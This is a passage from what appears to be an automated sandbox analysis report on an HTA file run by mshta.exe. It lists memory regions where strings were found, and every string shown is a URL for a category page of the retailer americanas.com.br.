00000001.00000003.12476053747.000000000A9D7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12397099421.000000000DB30000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12492554371.000000000BEF6000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12476100216.00000000095CC000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12496397360.00000000095D8000.00000004.00000020.00020000.00000000.sdmp, Archivo-PxFkiLTWYG-23122024095010.htaString found in binary or memory: https://www.americanas.com.br/categoria/informatica-e-acessorios?chave=pfm_home_infoacess_menu
Source: mshta.exe, 00000001.00000003.12511109691.00000000095F9000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12492072081.000000000A9F3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12509642076.00000000095F7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12507753981.000000000BEF7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12475964347.000000000BEF0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12477881373.00000000095F7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12511752644.000000000AACD000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12396115872.00000000069D9000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12494876647.00000000095F7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12475450040.000000000BE9B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12475706926.000000000BEC8000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12508375868.00000000095F7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000002.12577567437.000000000AACD000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12476053747.000000000A9D7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12396431182.0000000006A00000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12397099421.000000000DB30000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12492554371.000000000BEF6000.00000004.00000020.00020000.00000000.sdmp, Archivo-PxFkiLTWYG-23122024095010.htaString found in binary or memory: https://www.americanas.com.br/categoria/informatica/computadores-e-all-in-one/computador-gamer?chave
Source: mshta.exe, 00000001.00000003.12511109691.00000000095F9000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12476100216.00000000096ED000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12492072081.000000000A9F3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12496581245.00000000096ED000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12509642076.00000000095F7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12495682356.00000000096ED000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12507753981.000000000BEF7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12500895318.00000000096ED000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12475964347.000000000BEF0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12477881373.00000000095F7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12511302966.00000000096F1000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12396115872.00000000069D9000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12494876647.00000000095F7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12475450040.000000000BE9B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12475706926.000000000BEC8000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12508375868.00000000095F7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12503196955.00000000096ED000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12476053747.000000000A9D7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12396431182.0000000006A00000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12492777250.00000000096ED000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12397099421.000000000DB30000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.americanas.com.br/categoria/informatica/computadores-e-all-in-one/computador?chave=pfm_h
Source: mshta.exe, 00000001.00000003.12396857850.000000000DA98000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12492072081.000000000A9F3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000002.12577918644.000000000AB5B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12507753981.000000000BEF7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12515721910.00000000095EB000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12492777250.00000000095E7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12475964347.000000000BEF0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12494876647.00000000095E9000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12502602065.000000000AB3A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12396115872.00000000069D9000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12509600990.000000000AB5A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12475450040.000000000BE9B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12475706926.000000000BEC8000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12478964255.00000000095E6000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12476053747.000000000A9D7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12396431182.0000000006A00000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12477881373.00000000095E1000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12397099421.000000000DB30000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12508375868.00000000095EB000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12551073460.000000000AB5B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12492554371.000000000BEF6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.americanas.com.br/categoria/informatica/notebooks-gamer?chave=pfm_hm_tt_1_0_notebook-gam
Source: mshta.exe, 00000001.00000003.12396857850.000000000DA98000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12476802563.000000000AA43000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12507753981.000000000BEF7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12475964347.000000000BEF0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12477881373.00000000095F7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12511752644.000000000AACD000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12492174257.000000000AA49000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12494876647.00000000095F7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12550895184.000000000960B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12475450040.000000000BE9B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12475706926.000000000BEC8000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000002.12577567437.000000000AACD000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12496581245.000000000960A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12476053747.000000000A9D7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12502944893.000000000715E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12485820978.0000000009DA1000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12397099421.000000000DB30000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12485974974.0000000009DA2000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12492554371.000000000BEF6000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12495682356.00000000095FB000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000002.12574416086.000000000960B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.americanas.com.br/categoria/informatica/notebooks?chave=dk_hm_at_notebooks
Source: mshta.exe, 00000001.00000003.12396857850.000000000DA98000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12504149097.000000000A97E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12492072081.000000000A9F3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12507753981.000000000BEF7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12515721910.00000000095EB000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12502755774.000000000BE67000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000002.12577325605.000000000A988000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12492777250.00000000095E7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12475964347.000000000BEF0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12494876647.00000000095E9000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12511657871.000000000A987000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12502602065.000000000AB3A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12511077657.000000000BE92000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12509600990.000000000AB5A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12509074640.000000000BE8F000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12480570290.000000000BE62000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12475450040.000000000BE9B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12508336331.000000000BE85000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12475706926.000000000BEC8000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12478964255.00000000095E6000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12476053747.000000000A9D7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.americanas.com.br/categoria/informatica/notebooks?chave=pfm_hm_tt_1_0_notebook
Source: mshta.exe, 00000001.00000003.12396857850.000000000DA98000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12492072081.000000000A9F3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12507753981.000000000BEF7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12475964347.000000000BEF0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12477881373.00000000095F7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12396115872.00000000069D9000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12494876647.00000000095F7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000002.12573133207.0000000007150000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12475450040.000000000BE9B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12475706926.000000000BEC8000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12476053747.000000000A9D7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12396431182.0000000006A00000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12511180045.000000000AAE3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12494206184.000000000AAE0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000002.12577643255.000000000AAE5000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12397099421.000000000DB30000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12492554371.000000000BEF6000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12495682356.00000000095FB000.00000004.00000020.00020000.00000000.sdmp, Archivo-PxFkiLTWYG-23122024095010.htaString found in binary or memory: https://www.americanas.com.br/categoria/informatica/tablet-e-ipad/tablet?chave=pfm_hm_tt_1_0_tablet
Source: mshta.exe, 00000001.00000003.12396857850.000000000DA98000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12504149097.000000000A97E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12476802563.000000000AA43000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12507926809.000000000BE97000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12507753981.000000000BEF7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12515721910.00000000095EB000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12508760414.000000000BDF1000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12506503755.000000000A99B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12502755774.000000000BE67000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12492777250.00000000095E7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12475964347.000000000BEF0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12494876647.00000000095E9000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12492174257.000000000AA49000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12511332893.000000000A99C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12555859176.000000000BDFF000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12480570290.000000000BE62000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12475450040.000000000BE9B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12475706926.000000000BEC8000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12478964255.00000000095E6000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12492697957.000000000BDF1000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000002.12578720986.000000000BE00000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.americanas.com.br/categoria/informatica?chave=pfm_hm_tt_1_0_informatica
Source: mshta.exe, 00000001.00000003.12396857850.000000000DA98000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12504149097.000000000A97E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12492072081.000000000A9F3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12507753981.000000000BEF7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12508798468.000000000BE76000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000002.12579155988.000000000BE7E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12508608881.000000000BE68000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12506503755.000000000A99B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12502755774.000000000BE67000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12475964347.000000000BEF0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12396115872.00000000069D9000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12511332893.000000000A99C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12566800059.00000000095D9000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12480570290.000000000BE62000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12508682956.000000000BE70000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12475450040.000000000BE9B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12396527148.00000000069EC000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12475706926.000000000BEC8000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12476053747.000000000A9D7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12475890850.000000000BE62000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12397099421.000000000DB30000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.americanas.com.br/categoria/informatica?chave=pfm_home_informatica_menu
Source: mshta.exe, 00000001.00000003.12396857850.000000000DA98000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12502000266.00000000095DE000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12492072081.000000000A9F3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12507753981.000000000BEF7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12475964347.000000000BEF0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12511752644.000000000AACD000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12396115872.00000000069D9000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12475450040.000000000BE9B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12396527148.00000000069EC000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12475706926.000000000BEC8000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000002.12577567437.000000000AACD000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12476053747.000000000A9D7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12397099421.000000000DB30000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12492554371.000000000BEF6000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12476100216.00000000095CC000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12496397360.00000000095D8000.00000004.00000020.00020000.00000000.sdmp, Archivo-PxFkiLTWYG-23122024095010.htaString found in binary or memory: https://www.americanas.com.br/categoria/instrumentos-musicais?chave=pfm_home_instrumentos_menu
Source: mshta.exe, 00000001.00000003.12396857850.000000000DA98000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12494206184.000000000AB10000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12508552958.000000000BE0D000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12476802563.000000000AA43000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12507753981.000000000BEF7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12475964347.000000000BEF0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12551145227.000000000AB11000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12554832793.000000000AB10000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12492174257.000000000AA49000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12511180045.000000000AB10000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12475450040.000000000BE9B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12475706926.000000000BEC8000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12476053747.000000000A9D7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12502944893.000000000715E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12492697957.000000000BDF1000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12397099421.000000000DB30000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000001.00000002.12578801293.000000000BE2F000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12508834101.000000000BE2B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12492554371.000000000BEF6000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12476847039.000000000BDED000.00000004.00000020.00020000.00000000.sdmp, Archivo-PxFkiLTWYG-23122024095010.htaString found in binary or memory: https://www.americanas.com.br/categoria/livros?chave=dk_hm_at_livros
Source: mshta.exe, 00000001.00000003.12396857850.000000000DA98000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12502000266.00000000095DE000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12492072081.000000000A9F3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000002.12578035949.000000000AB87000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12507753981.000000000BEF7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12502755774.000000000BE67000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12475964347.000000000BEF0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12502602065.000000000AB3A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12559545171.000000000AB86000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12396115872.00000000069D9000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12559064274.000000000AB7C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12515936118.000000000AB69000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12509600990.000000000AB5A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12480570290.000000000BE62000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12475450040.000000000BE9B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12508336331.000000000BE85000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12396527148.00000000069EC000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12475706926.000000000BEC8000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12551257362.000000000AB7B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12476053747.000000000A9D7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12477881373.00000000095E1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.americanas.com.br/categoria/livros?chave=pfm_home_livros_menu
Source: mshta.exe, 00000001.00000003.12396857850.000000000DA98000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12502000266.00000000095DE000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12492072081.000000000A9F3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12507753981.000000000BEF7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12475964347.000000000BEF0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12511752644.000000000AACD000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12396115872.00000000069D9000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12475450040.000000000BE9B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12396527148.00000000069EC000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12475706926.000000000BEC8000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000002.12577567437.000000000AACD000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12476053747.000000000A9D7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12397099421.000000000DB30000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12492554371.000000000BEF6000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12476100216.00000000095CC000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12496397360.00000000095D8000.00000004.00000020.00020000.00000000.sdmp, Archivo-PxFkiLTWYG-23122024095010.htaString found in binary or memory: https://www.americanas.com.br/categoria/malas-mochilas-e-acessorios?chave=pfm_home_malas_menu
Source: mshta.exe, 00000001.00000003.12396857850.000000000DA98000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12476917158.000000000C131000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12492072081.000000000A9F3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12507753981.000000000BEF7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12502755774.000000000BE67000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12475964347.000000000BEF0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12567402670.000000000C140000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12396485604.00000000069FC000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12511752644.000000000AACD000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12396115872.00000000069D9000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000002.12580125535.000000000C141000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12480570290.000000000BE62000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12475450040.000000000BE9B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12508336331.000000000BE85000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12475706926.000000000BEC8000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000002.12577567437.000000000AACD000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12476053747.000000000A9D7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12477881373.00000000095E1000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12475890850.000000000BE62000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12492777250.00000000095E4000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12397099421.000000000DB30000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.americanas.com.br/categoria/mercado/alimentos?chave=pc_cat_menu_mercearia_mercado
Source: mshta.exe, 00000001.00000003.12396857850.000000000DA98000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12492072081.000000000A9F3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12507753981.000000000BEF7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12508798468.000000000BE76000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000002.12579155988.000000000BE7E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12508608881.000000000BE68000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12502755774.000000000BE67000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12475964347.000000000BEF0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000002.12577998320.000000000AB6F000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12502602065.000000000AB3A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12515936118.000000000AB69000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12509600990.000000000AB5A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12480570290.000000000BE62000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12508682956.000000000BE70000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12475450040.000000000BE9B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12475706926.000000000BEC8000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12476053747.000000000A9D7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12511180045.000000000AAE3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12494206184.000000000AAE0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 